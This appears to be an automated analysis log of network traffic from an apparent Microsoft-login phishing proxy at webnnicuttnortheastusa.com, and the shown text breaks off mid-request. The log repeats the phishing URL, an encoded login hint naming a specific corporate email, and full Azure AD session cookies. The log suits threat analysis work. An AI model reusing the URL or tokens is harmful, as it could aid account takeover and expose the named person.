https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_HynxqeZdtbyHDb4R-n7Odg2.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_fo8rkc18qnhjh4wnzabsdg2.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA
Source: global traffic	HTTP traffic detected: GET /owa/prefetch.aspx HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://webnnicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AVgAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYAKfb0xDrBDmuWkDZksychHezAXJVsHP4EQwGx7a3_trg7co4sO791uh9-QiGf586jFW5A634qM65rEyFS5zxB1c2R_quGsxybUxFS72HmL8gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYZRbmyOSq5H_vI0oMz1hhofSWhTEdlIctIO47tS5ABlihZKqM0tfj0hH8SzF__qcI0mAflGpmWNW8UE2CTcj8J7NYF4j6Plk0WyQUo4Q-tvMUsB2TwXPKUpqb6X1rH_kF9TPEA2Ftn1GJeBhPRER_FAcam7NKKcYUWU9HR47iljogAA; esctx-zbHcFhnl1NU=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWA3zCT34QFOutTGBrXFIUye0ejGv9uet9_02Tipac6s7qPmoEhkGFLY65lFqSl6gu8nPMk5xzIbYSYFZXvp8bzdgFEe5S73WgY6ncbs6thp4c2cf3jWaGSGqNGQ28HvU_V1uoT4OMs2FXTs6e20V0SAA; fpc=Ahr3BJFnNFVEniLAsb5y5xOerOTJAQAAAGWaB94OAAAA; brcap=0
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: 